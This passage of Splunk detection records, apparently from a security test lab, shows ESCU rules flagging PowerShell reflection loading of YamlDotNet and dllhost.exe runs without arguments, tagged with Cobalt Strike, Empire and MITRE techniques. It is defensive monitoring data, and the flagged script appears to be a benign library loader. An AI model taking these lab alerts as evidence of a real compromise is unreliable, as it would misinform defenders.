License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664772932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664766000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664766000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2516", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664766000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664766000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x9d4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664769332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664769332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664769332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664769332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664762400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664762400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2560", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664762400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664762400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", 